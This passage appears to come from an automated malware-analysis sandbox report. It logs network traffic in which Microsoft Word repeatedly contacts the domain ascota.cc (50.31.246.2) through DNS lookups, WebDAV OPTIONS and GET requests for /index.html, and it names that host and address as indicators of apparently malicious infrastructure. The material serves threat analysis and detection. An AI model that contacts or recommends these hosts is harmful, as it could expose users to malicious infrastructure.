        Aug 18, 2022 10:45:10.074354887 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.074388981 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.075748920 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.075824976 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.075858116 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.075969934 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.077833891 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.077857018 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.077864885 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.077967882 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.293340921 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.293385983 CEST4434917850.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.293483973 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.294291973 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.294312954 CEST4434917850.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.349548101 CEST4434917850.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.349668980 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.357033968 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.357053995 CEST4434917850.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.360637903 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.360646009 CEST4434917850.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.573194981 CEST4434917850.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.573323965 CEST4434917850.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.573463917 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.573813915 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.573843956 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.573865891 CEST4434917850.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.573914051 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.573940992 CEST49178443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.785244942 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.785288095 CEST4434917950.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.785352945 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.785614014 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.785624981 CEST4434917950.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.839936972 CEST4434917950.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.840070009 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.847382069 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.847408056 CEST4434917950.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.851104021 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.851126909 CEST4434917950.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.139723063 CEST4434917950.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.139847040 CEST4434917950.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.139909983 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.139930964 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.140275955 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.140295029 CEST4434917950.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.140311956 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.140391111 CEST49179443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.147294998 CEST49180443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.147339106 CEST4434918050.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.147430897 CEST49180443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.147699118 CEST49180443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.147721052 CEST4434918050.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.203635931 CEST4434918050.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.203808069 CEST49180443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.222867966 CEST49180443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.222898006 CEST4434918050.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.226602077 CEST49180443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.226632118 CEST4434918050.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.402895927 CEST4434918050.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.403162956 CEST49180443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.403194904 CEST4434918050.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.403280020 CEST49180443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.403753042 CEST49180443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.403806925 CEST49180443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.535923004 CEST49181443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.535960913 CEST4434918150.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.536061049 CEST49181443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.549046040 CEST49181443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.549067974 CEST4434918150.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.608119011 CEST4434918150.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.608243942 CEST49181443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.617646933 CEST49181443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.617681026 CEST4434918150.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.618109941 CEST4434918150.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.629355907 CEST49181443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.671389103 CEST4434918150.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.812930107 CEST4434918150.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.813029051 CEST4434918150.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.813158989 CEST49181443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.814188957 CEST49181443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.814218998 CEST4434918150.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.827459097 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.827512980 CEST4434918250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.827588081 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.827975988 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.828001022 CEST4434918250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.883140087 CEST4434918250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.883291960 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.889851093 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.889878035 CEST4434918250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:11.892756939 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:11.892781019 CEST4434918250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.125530005 CEST4434918250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.125669003 CEST4434918250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.125725031 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.125912905 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.126020908 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.126049042 CEST4434918250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.126058102 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.126116991 CEST49182443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.130564928 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.130620956 CEST4434918350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.130691051 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.130939007 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.130955935 CEST4434918350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.185605049 CEST4434918350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.185710907 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.200522900 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.200556993 CEST4434918350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.203906059 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.203924894 CEST4434918350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.408741951 CEST4434918350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.408860922 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.408888102 CEST4434918350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.408911943 CEST4434918350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.408940077 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.408955097 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.416229963 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.416265965 CEST4434918350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.416281939 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.416322947 CEST49183443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.638792038 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.638837099 CEST4434918450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.638919115 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.639153957 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.639172077 CEST4434918450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.695440054 CEST4434918450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.695642948 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.709549904 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.709578037 CEST4434918450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.712866068 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.712899923 CEST4434918450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.907793045 CEST4434918450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.907877922 CEST4434918450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.907974958 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.907994032 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.908360958 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.908380032 CEST4434918450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.908426046 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.908452988 CEST49184443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.920595884 CEST49185443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.920650959 CEST4434918550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.920737028 CEST49185443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.921029091 CEST49185443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.921046972 CEST4434918550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.976026058 CEST4434918550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.976150036 CEST49185443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.983681917 CEST49185443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.983710051 CEST4434918550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:12.987410069 CEST49185443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:12.987433910 CEST4434918550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:13.285599947 CEST4434918550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:13.285693884 CEST4434918550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:13.285736084 CEST49185443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:13.285753965 CEST49185443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:13.289699078 CEST49185443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:13.289721966 CEST4434918550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:13.289757013 CEST49185443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:13.289781094 CEST49185443192.168.2.2250.31.246.2

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        Aug 18, 2022 10:44:56.070009947 CEST5586853192.168.2.228.8.8.8
        Aug 18, 2022 10:44:56.098654032 CEST53558688.8.8.8192.168.2.22
        Aug 18, 2022 10:45:02.957827091 CEST4968853192.168.2.228.8.8.8
        Aug 18, 2022 10:45:02.976468086 CEST53496888.8.8.8192.168.2.22
        Aug 18, 2022 10:45:02.979785919 CEST5883653192.168.2.228.8.8.8
        Aug 18, 2022 10:45:03.008815050 CEST53588368.8.8.8192.168.2.22
        Aug 18, 2022 10:45:08.507638931 CEST5013453192.168.2.228.8.8.8
        Aug 18, 2022 10:45:08.536362886 CEST53501348.8.8.8192.168.2.22
        Aug 18, 2022 10:45:08.539170980 CEST5527553192.168.2.228.8.8.8
        Aug 18, 2022 10:45:08.558255911 CEST53552758.8.8.8192.168.2.22
        Aug 18, 2022 10:45:11.469767094 CEST5991553192.168.2.228.8.8.8
        Aug 18, 2022 10:45:11.503859043 CEST53599158.8.8.8192.168.2.22
        Aug 18, 2022 10:45:11.508650064 CEST5440853192.168.2.228.8.8.8
        Aug 18, 2022 10:45:11.534944057 CEST53544088.8.8.8192.168.2.22

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
        Aug 18, 2022 10:44:56.070009947 CEST192.168.2.228.8.8.80x245aStandard query (0)ascota.ccA (IP address)IN (0x0001)
        Aug 18, 2022 10:45:02.957827091 CEST192.168.2.228.8.8.80xdf20Standard query (0)ascota.ccA (IP address)IN (0x0001)
        Aug 18, 2022 10:45:02.979785919 CEST192.168.2.228.8.8.80x25b4Standard query (0)ascota.ccA (IP address)IN (0x0001)
        Aug 18, 2022 10:45:08.507638931 CEST192.168.2.228.8.8.80xf2caStandard query (0)ascota.ccA (IP address)IN (0x0001)
        Aug 18, 2022 10:45:08.539170980 CEST192.168.2.228.8.8.80xdc64Standard query (0)ascota.ccA (IP address)IN (0x0001)
        Aug 18, 2022 10:45:11.469767094 CEST192.168.2.228.8.8.80xc2a1Standard query (0)ascota.ccA (IP address)IN (0x0001)
        Aug 18, 2022 10:45:11.508650064 CEST192.168.2.228.8.8.80xcdf9Standard query (0)ascota.ccA (IP address)IN (0x0001)

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
        Aug 18, 2022 10:44:56.098654032 CEST8.8.8.8192.168.2.220x245aNo error (0)ascota.cc50.31.246.2A (IP address)IN (0x0001)
        Aug 18, 2022 10:45:02.976468086 CEST8.8.8.8192.168.2.220xdf20No error (0)ascota.cc50.31.246.2A (IP address)IN (0x0001)
        Aug 18, 2022 10:45:03.008815050 CEST8.8.8.8192.168.2.220x25b4No error (0)ascota.cc50.31.246.2A (IP address)IN (0x0001)
        Aug 18, 2022 10:45:08.536362886 CEST8.8.8.8192.168.2.220xf2caNo error (0)ascota.cc50.31.246.2A (IP address)IN (0x0001)
        Aug 18, 2022 10:45:08.558255911 CEST8.8.8.8192.168.2.220xdc64No error (0)ascota.cc50.31.246.2A (IP address)IN (0x0001)
        Aug 18, 2022 10:45:11.503859043 CEST8.8.8.8192.168.2.220xc2a1No error (0)ascota.cc50.31.246.2A (IP address)IN (0x0001)
        Aug 18, 2022 10:45:11.534944057 CEST8.8.8.8192.168.2.220xcdf9No error (0)ascota.cc50.31.246.2A (IP address)IN (0x0001)

        HTTP Request Dependency Graph

        • ascota.cc

        HTTPS Proxied Packets

        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.224917150.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:44:56 UTC0OUTOPTIONS / HTTP/1.1
        User-Agent: Microsoft Office Protocol Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:44:56 UTC0INHTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR210BRBP96WNT2Q6H320TQ-ams
        date: Thu, 18 Aug 2022 08:44:56 GMT
        content-type: application/xml
        x-amz-request-id: 768J132S0B4T21B2
        x-amz-id-2: d4QSaZ9YlSeHN4P65OLvrd4lB2u8Fq6NGcxO+c4PUM/H9Io+wI87nfv+A7gfx+zqNXPPkoWD0a4=
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:44:56 UTC0INData Raw: 31 31 42 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 37 36 38 4a 31 33 32 53 30 42 34 54 32 31 42 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 64 34 51 53 61 5a 39 59 6c 53 65 48 4e 34 50 36 35 4f 4c 76 72 64 34 6c 42 32 75 38 46 71 36 4e 47 63 78 4f 2b 63 34 50 55 4d 2f 48 39 49 6f 2b 77 49 38 37 6e 66 76 2b 41 37 67 66
        Data Ascii: 11B<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>768J132S0B4T21B2</RequestId><HostId>d4QSaZ9YlSeHN4P65OLvrd4lB2u8Fq6NGcxO+c4PUM/H9Io+wI87nfv+A7gf
        2022-08-18 08:44:56 UTC0INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortProcess
        1192.168.2.224917250.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:03 UTC0OUTHEAD /index.html HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        2022-08-18 08:45:03 UTC0INHTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR216RA143D01GW9NXZXFSK-ams
        date: Thu, 18 Aug 2022 08:45:03 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: 2ir0Wh7U0Ee1QxDRpmxUUatBFijqjVp4CAAO7sLOy4jLOlTKs/VHAXlpkbaab5AD9XD5OQ3vC9E=
        x-amz-request-id: RM0PNSRVYN4E7T44
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session IDSource IPSource PortDestination IPDestination PortProcess
        10192.168.2.224918150.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:11 UTC16OUTHEAD /index.html HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        2022-08-18 08:45:11 UTC16INHTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21F2RHB1DBHZK6WQQJ6MK-ams
        date: Thu, 18 Aug 2022 08:45:11 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: IuhFaHvDAeDpDgIfnVq+uXVcHU9JcUXuLukvCt1euFLf4hfQwIcte6N5I4/DhS+6wy/5NBU3lKU=
        x-amz-request-id: PBBEVXDQGTVDF9CR
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session IDSource IPSource PortDestination IPDestination PortProcess
        11192.168.2.224918250.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:11 UTC17OUTGET /index.html HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        Host: ascota.cc
        If-Modified-Since: Thu, 02 Jun 2022 20:21:18 GMT
        If-None-Match: "fbdacf8fb5cca0abfed43223d32f89dd"
        Connection: Keep-Alive
        2022-08-18 08:45:12 UTC17INHTTP/1.1 304 Not Modified
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21FBD37TP13VS06KVKXJ0-ams
        date: Thu, 18 Aug 2022 08:45:12 GMT
        x-amz-id-2: /Nt1AUly0tzTfndLFTVyQ8Cnm/xOqlEtv0TqGH4oKQseruFU5QCGwbKeT21pHrue7YzFJu+PGUg=
        x-amz-request-id: FC4C7WRPCX9ERTTP
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        via: 1.1 fly.io


        Session IDSource IPSource PortDestination IPDestination PortProcess
        12192.168.2.224918350.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:12 UTC18OUTHEAD /index.html HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:45:12 UTC18INHTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21FMTNN2M9KB6JKRFXSKP-ams
        date: Thu, 18 Aug 2022 08:45:12 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: c7mk68b1N1ISSCy5CLEtjdo797ehnKJKyee2aDfQggt6HWSImbsaaCNMyzJ14kAt/iiwIzVJwRd2YkxvGGnaqQ==
        x-amz-request-id: FC436W0W6F4HFQZ5
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session IDSource IPSource PortDestination IPDestination PortProcess
        13192.168.2.224918450.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:12 UTC18OUTHEAD /index.html HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:45:12 UTC18INHTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21G4SWQ5H9CNY42Z3BHZ4-ams
        date: Thu, 18 Aug 2022 08:45:12 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: ycyuRI5+NbpIDfx6FxQbtaxkCLc5TFsZxZWjBHit20DGILG9TYs8j3lgeG38c3dXkTleIWKNDuw=
        x-amz-request-id: FC41SAMNW4ZDDAQ6
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session IDSource IPSource PortDestination IPDestination PortProcess
        14192.168.2.224918550.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:12 UTC19OUTGET /index.html HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: ascota.cc
        If-Modified-Since: Thu, 02 Jun 2022 20:21:18 GMT
        If-None-Match: "fbdacf8fb5cca0abfed43223d32f89dd"
        Connection: Keep-Alive
        2022-08-18 08:45:13 UTC19INHTTP/1.1 304 Not Modified
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21GDH0TDH0ATQ1GWWZZ8H-ams
        date: Thu, 18 Aug 2022 08:45:13 GMT
        x-amz-id-2: Bpzzztlz16vdeJyiYG+WwvEBLAYbVKxmP7DB2nprcIDZnrgMFRWv6Bm+3jVBQF1iExc+5q335ng=
        x-amz-request-id: 5ABDY4R98TSNNASA
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        via: 1.1 fly.io


        Session IDSource IPSource PortDestination IPDestination PortProcess
        2192.168.2.224917350.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:08 UTC1OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: ascota.cc
        2022-08-18 08:45:08 UTC1INHTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21C5WQ7EEE4BFA1ZZV84V-ams
        date: Thu, 18 Aug 2022 08:45:08 GMT
        content-type: application/xml
        x-amz-request-id: XSQGW29MK512DM3T
        x-amz-id-2: mwYL4EedNOPgCARydvDp9oQg8znlxzY4ajr97QzUsjgMJSxpIxXfLl85O4uGrNnA7w8Wq5PSDHs=
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:45:08 UTC1INData Raw: 31 31 42 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 58 53 51 47 57 32 39 4d 4b 35 31 32 44 4d 33 54 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 6d 77 59 4c 34 45 65 64 4e 4f 50 67 43 41 52 79 64 76 44 70 39 6f 51 67 38 7a 6e 6c 78 7a 59 34 61 6a 72 39 37 51 7a 55 73 6a 67 4d 4a 53 78 70 49 78 58 66 4c 6c 38 35 4f 34 75 47
        Data Ascii: 11B<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>XSQGW29MK512DM3T</RequestId><HostId>mwYL4EedNOPgCARydvDp9oQg8znlxzY4ajr97QzUsjgMJSxpIxXfLl85O4uG
        2022-08-18 08:45:08 UTC2INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortProcess
        3192.168.2.224917450.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:08 UTC2OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: ascota.cc
